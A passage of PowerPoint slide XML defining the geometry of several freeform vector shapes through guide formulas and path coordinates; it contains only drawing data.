                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="666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5" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2913063" y="2084388"/>
                <a:ext cx="207962" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 331 w 579"/>
                  <a:gd name="T1" fmla="*/ 405 h 558"/>
                  <a:gd name="T2" fmla="*/ 389 w 579"/>
                  <a:gd name="T3" fmla="*/ 431 h 558"/>
                  <a:gd name="T4" fmla="*/ 404 w 579"/>
                  <a:gd name="T5" fmla="*/ 425 h 558"/>
                  <a:gd name="T6" fmla="*/ 441 w 579"/>
                  <a:gd name="T7" fmla="*/ 399 h 558"/>
                  <a:gd name="T8" fmla="*/ 457 w 579"/>
                  <a:gd name="T9" fmla="*/ 373 h 558"/>
                  <a:gd name="T10" fmla="*/ 463 w 579"/>
                  <a:gd name="T11" fmla="*/ 347 h 558"/>
                  <a:gd name="T12" fmla="*/ 452 w 579"/>
                  <a:gd name="T13" fmla="*/ 321 h 558"/>
                  <a:gd name="T14" fmla="*/ 436 w 579"/>
                  <a:gd name="T15" fmla="*/ 299 h 558"/>
                  <a:gd name="T16" fmla="*/ 394 w 579"/>
                  <a:gd name="T17" fmla="*/ 289 h 558"/>
                  <a:gd name="T18" fmla="*/ 374 w 579"/>
                  <a:gd name="T19" fmla="*/ 294 h 558"/>
                  <a:gd name="T20" fmla="*/ 263 w 579"/>
                  <a:gd name="T21" fmla="*/ 357 h 558"/>
                  <a:gd name="T22" fmla="*/ 237 w 579"/>
                  <a:gd name="T23" fmla="*/ 373 h 558"/>
                  <a:gd name="T24" fmla="*/ 184 w 579"/>
                  <a:gd name="T25" fmla="*/ 389 h 558"/>
                  <a:gd name="T26" fmla="*/ 158 w 579"/>
                  <a:gd name="T27" fmla="*/ 389 h 558"/>
                  <a:gd name="T28" fmla="*/ 110 w 579"/>
                  <a:gd name="T29" fmla="*/ 383 h 558"/>
                  <a:gd name="T30" fmla="*/ 63 w 579"/>
                  <a:gd name="T31" fmla="*/ 352 h 558"/>
                  <a:gd name="T32" fmla="*/ 43 w 579"/>
                  <a:gd name="T33" fmla="*/ 331 h 558"/>
                  <a:gd name="T34" fmla="*/ 21 w 579"/>
                  <a:gd name="T35" fmla="*/ 305 h 558"/>
                  <a:gd name="T36" fmla="*/ 0 w 579"/>
                  <a:gd name="T37" fmla="*/ 242 h 558"/>
                  <a:gd name="T38" fmla="*/ 6 w 579"/>
                  <a:gd name="T39" fmla="*/ 210 h 558"/>
                  <a:gd name="T40" fmla="*/ 11 w 579"/>
                  <a:gd name="T41" fmla="*/ 168 h 558"/>
                  <a:gd name="T42" fmla="*/ 63 w 579"/>
                  <a:gd name="T43" fmla="*/ 89 h 558"/>
                  <a:gd name="T44" fmla="*/ 90 w 579"/>
                  <a:gd name="T45" fmla="*/ 53 h 558"/>
                  <a:gd name="T46" fmla="*/ 153 w 579"/>
                  <a:gd name="T47" fmla="*/ 11 h 558"/>
                  <a:gd name="T48" fmla="*/ 184 w 579"/>
                  <a:gd name="T49" fmla="*/ 0 h 558"/>
                  <a:gd name="T50" fmla="*/ 247 w 579"/>
                  <a:gd name="T51" fmla="*/ 5 h 558"/>
                  <a:gd name="T52" fmla="*/ 305 w 579"/>
                  <a:gd name="T53" fmla="*/ 37 h 558"/>
                  <a:gd name="T54" fmla="*/ 242 w 579"/>
                  <a:gd name="T55" fmla="*/ 152 h 558"/>
                  <a:gd name="T56" fmla="*/ 210 w 579"/>
                  <a:gd name="T57" fmla="*/ 131 h 558"/>
                  <a:gd name="T58" fmla="*/ 184 w 579"/>
                  <a:gd name="T59" fmla="*/ 126 h 558"/>
                  <a:gd name="T60" fmla="*/ 158 w 579"/>
                  <a:gd name="T61" fmla="*/ 131 h 558"/>
                  <a:gd name="T62" fmla="*/ 137 w 579"/>
                  <a:gd name="T63" fmla="*/ 147 h 558"/>
                  <a:gd name="T64" fmla="*/ 121 w 579"/>
                  <a:gd name="T65" fmla="*/ 195 h 558"/>
                  <a:gd name="T66" fmla="*/ 121 w 579"/>
                  <a:gd name="T67" fmla="*/ 210 h 558"/>
                  <a:gd name="T68" fmla="*/ 142 w 579"/>
                  <a:gd name="T69" fmla="*/ 242 h 558"/>
                  <a:gd name="T70" fmla="*/ 158 w 579"/>
                  <a:gd name="T71" fmla="*/ 252 h 558"/>
                  <a:gd name="T72" fmla="*/ 179 w 579"/>
                  <a:gd name="T73" fmla="*/ 252 h 558"/>
                  <a:gd name="T74" fmla="*/ 231 w 579"/>
                  <a:gd name="T75" fmla="*/ 231 h 558"/>
                  <a:gd name="T76" fmla="*/ 310 w 579"/>
                  <a:gd name="T77" fmla="*/ 184 h 558"/>
                  <a:gd name="T78" fmla="*/ 363 w 579"/>
                  <a:gd name="T79" fmla="*/ 152 h 558"/>
                  <a:gd name="T80" fmla="*/ 415 w 579"/>
                  <a:gd name="T81" fmla="*/ 147 h 558"/>
                  <a:gd name="T82" fmla="*/ 436 w 579"/>
                  <a:gd name="T83" fmla="*/ 147 h 558"/>
                  <a:gd name="T84" fmla="*/ 489 w 579"/>
                  <a:gd name="T85" fmla="*/ 168 h 558"/>
                  <a:gd name="T86" fmla="*/ 510 w 579"/>
                  <a:gd name="T87" fmla="*/ 184 h 558"/>
                  <a:gd name="T88" fmla="*/ 562 w 579"/>
                  <a:gd name="T89" fmla="*/ 247 h 558"/>
                  <a:gd name="T90" fmla="*/ 573 w 579"/>
                  <a:gd name="T91" fmla="*/ 278 h 558"/>
                  <a:gd name="T92" fmla="*/ 578 w 579"/>
                  <a:gd name="T93" fmla="*/ 315 h 558"/>
                  <a:gd name="T94" fmla="*/ 562 w 579"/>
                  <a:gd name="T95" fmla="*/ 383 h 558"/>
                  <a:gd name="T96" fmla="*/ 541 w 579"/>
                  <a:gd name="T97" fmla="*/ 420 h 558"/>
                  <a:gd name="T98" fmla="*/ 515 w 579"/>
                  <a:gd name="T99" fmla="*/ 457 h 558"/>
                  <a:gd name="T100" fmla="*/ 447 w 579"/>
                  <a:gd name="T101" fmla="*/ 525 h 558"/>
                  <a:gd name="T102" fmla="*/ 410 w 579"/>
                  <a:gd name="T103" fmla="*/ 546 h 558"/>
                  <a:gd name="T104" fmla="*/ 378 w 579"/>
                  <a:gd name="T105" fmla="*/ 557 h 558"/>
                  <a:gd name="T106" fmla="*/ 316 w 579"/>
                  <a:gd name="T107" fmla="*/ 546 h 558"/>
                  <a:gd name="T108" fmla="*/ 284 w 579"/>
                  <a:gd name="T109" fmla="*/ 530 h 558"/>
                  <a:gd name="T110" fmla="*/ 237 w 579"/>
                  <a:gd name="T111" fmla="*/ 494 h 558"/>
                  <a:gd name="T112" fmla="*/ 331 w 579"/>
                  <a:gd name="T113" fmla="*/ 405 h 5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79" h="558">
                    <a:moveTo>
                      <a:pt x="331" y="405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="331" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="405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6" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2955925" y="1952625"/>
                <a:ext cx="236538" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 658"/>
                  <a:gd name="T1" fmla="*/ 0 h 604"/>
                  <a:gd name="T2" fmla="*/ 189 w 658"/>
                  <a:gd name="T3" fmla="*/ 78 h 604"/>
                  <a:gd name="T4" fmla="*/ 89 w 658"/>
                  <a:gd name="T5" fmla="*/ 189 h 604"/>
                  <a:gd name="T6" fmla="*/ 0 w 658"/>
                  <a:gd name="T7" fmla="*/ 105 h 604"/>
                  <a:gd name="T8" fmla="*/ 95 w 658"/>
                  <a:gd name="T9" fmla="*/ 0 h 604"/>
                  <a:gd name="T10" fmla="*/ 236 w 658"/>
                  <a:gd name="T11" fmla="*/ 126 h 604"/>
                  <a:gd name="T12" fmla="*/ 657 w 658"/>
                  <a:gd name="T13" fmla="*/ 493 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 658"/>
                  <a:gd name="T15" fmla="*/ 603 h 604"/>
                  <a:gd name="T16" fmla="*/ 142 w 658"/>
                  <a:gd name="T17" fmla="*/ 231 h 604"/>
                  <a:gd name="T18" fmla="*/ 236 w 658"/>
                  <a:gd name="T19" fmla="*/ 126 h 6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58" h="604">
                    <a:moveTo>
                      <a:pt x="95" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="236" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="657" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126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7" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3094038" y="1884363"/>
                <a:ext cx="198437" cy="200025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 237 w 553"/>
                  <a:gd name="T1" fmla="*/ 142 h 557"/>
                  <a:gd name="T2" fmla="*/ 205 w 553"/>
                  <a:gd name="T3" fmla="*/ 126 h 557"/>
                  <a:gd name="T4" fmla="*/ 174 w 553"/>
                  <a:gd name="T5" fmla="*/ 120 h 557"/>
                  <a:gd name="T6" fmla="*/ 158 w 553"/>
                  <a:gd name="T7" fmla="*/ 126 h 557"/>
                  <a:gd name="T8" fmla="*/ 142 w 553"/>
                  <a:gd name="T9" fmla="*/ 136 h 557"/>
                  <a:gd name="T10" fmla="*/ 121 w 553"/>
                  <a:gd name="T11" fmla="*/ 178 h 557"/>
                  <a:gd name="T12" fmla="*/ 121 w 553"/>
                  <a:gd name="T13" fmla="*/ 199 h 557"/>
                  <a:gd name="T14" fmla="*/ 132 w 553"/>
                  <a:gd name="T15" fmla="*/ 220 h 557"/>
                  <a:gd name="T16" fmla="*/ 164 w 553"/>
                  <a:gd name="T17" fmla="*/ 267 h 557"/>
                  <a:gd name="T18" fmla="*/ 221 w 553"/>
                  <a:gd name="T19" fmla="*/ 330 h 557"/>
                  <a:gd name="T20" fmla="*/ 289 w 553"/>
                  <a:gd name="T21" fmla="*/ 388 h 557"/>
                  <a:gd name="T22" fmla="*/ 315 w 553"/>
                  <a:gd name="T23" fmla="*/ 409 h 557"/>
                  <a:gd name="T24" fmla="*/ 342 w 553"/>
                  <a:gd name="T25" fmla="*/ 425 h 557"/>
                  <a:gd name="T26" fmla="*/ 384 w 553"/>
                  <a:gd name="T27" fmla="*/ 430 h 557"/>
                  <a:gd name="T28" fmla="*/ 400 w 553"/>
                  <a:gd name="T29" fmla="*/ 425 h 557"/>
                  <a:gd name="T30" fmla="*/ 415 w 553"/>
                  <a:gd name="T31" fmla="*/ 414 h 557"/>
                  <a:gd name="T32" fmla="*/ 431 w 553"/>
                  <a:gd name="T33" fmla="*/ 383 h 557"/>
                  <a:gd name="T34" fmla="*/ 431 w 553"/>
                  <a:gd name="T35" fmla="*/ 351 h 557"/>
                  <a:gd name="T36" fmla="*/ 426 w 553"/>
                  <a:gd name="T37" fmla="*/ 336 h 557"/>
                  <a:gd name="T38" fmla="*/ 373 w 553"/>
                  <a:gd name="T39" fmla="*/ 273 h 557"/>
                  <a:gd name="T40" fmla="*/ 468 w 553"/>
                  <a:gd name="T41" fmla="*/ 173 h 557"/>
                  <a:gd name="T42" fmla="*/ 531 w 553"/>
                  <a:gd name="T43" fmla="*/ 252 h 557"/>
                  <a:gd name="T44" fmla="*/ 552 w 553"/>
                  <a:gd name="T45" fmla="*/ 325 h 557"/>
                  <a:gd name="T46" fmla="*/ 552 w 553"/>
                  <a:gd name="T47" fmla="*/ 362 h 557"/>
                  <a:gd name="T48" fmla="*/ 515 w 553"/>
                  <a:gd name="T49" fmla="*/ 441 h 557"/>
                  <a:gd name="T50" fmla="*/ 478 w 553"/>
                  <a:gd name="T51" fmla="*/ 483 h 557"/>
                  <a:gd name="T52" fmla="*/ 405 w 553"/>
                  <a:gd name="T53" fmla="*/ 541 h 557"/>
                  <a:gd name="T54" fmla="*/ 368 w 553"/>
                  <a:gd name="T55" fmla="*/ 556 h 557"/>
                  <a:gd name="T56" fmla="*/ 326 w 553"/>
                  <a:gd name="T57" fmla="*/ 556 h 557"/>
                  <a:gd name="T58" fmla="*/ 231 w 553"/>
                  <a:gd name="T59" fmla="*/ 520 h 557"/>
                  <a:gd name="T60" fmla="*/ 179 w 553"/>
                  <a:gd name="T61" fmla="*/ 483 h 557"/>
                  <a:gd name="T62" fmla="*/ 121 w 553"/>
                  <a:gd name="T63" fmla="*/ 430 h 557"/>
                  <a:gd name="T64" fmla="*/ 32 w 553"/>
                  <a:gd name="T65" fmla="*/ 320 h 557"/>
                  <a:gd name="T66" fmla="*/ 11 w 553"/>
                  <a:gd name="T67" fmla="*/ 273 h 557"/>
                  <a:gd name="T68" fmla="*/ 0 w 553"/>
                  <a:gd name="T69" fmla="*/ 226 h 557"/>
                  <a:gd name="T70" fmla="*/ 17 w 553"/>
                  <a:gd name="T71" fmla="*/ 142 h 557"/>
                  <a:gd name="T72" fmla="*/ 37 w 553"/>
                  <a:gd name="T73" fmla="*/ 100 h 557"/>
                  <a:gd name="T74" fmla="*/ 69 w 553"/>
                  <a:gd name="T75" fmla="*/ 63 h 557"/>
                  <a:gd name="T76" fmla="*/ 142 w 553"/>
                  <a:gd name="T77" fmla="*/ 10 h 557"/>
                  <a:gd name="T78" fmla="*/ 216 w 553"/>
                  <a:gd name="T79" fmla="*/ 0 h 557"/>
                  <a:gd name="T80" fmla="*/ 258 w 553"/>
                  <a:gd name="T81" fmla="*/ 5 h 557"/>
                  <a:gd name="T82" fmla="*/ 331 w 553"/>
                  <a:gd name="T83" fmla="*/ 42 h 557"/>
                  <a:gd name="T84" fmla="*/ 268 w 553"/>
                  <a:gd name="T85" fmla="*/ 173 h 557"/>
                  <a:gd name="T86" fmla="*/ 237 w 553"/>
                  <a:gd name="T87" fmla="*/ 142 h 5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553" h="557">
                    <a:moveTo>
                      <a:pt x="237" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="237" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
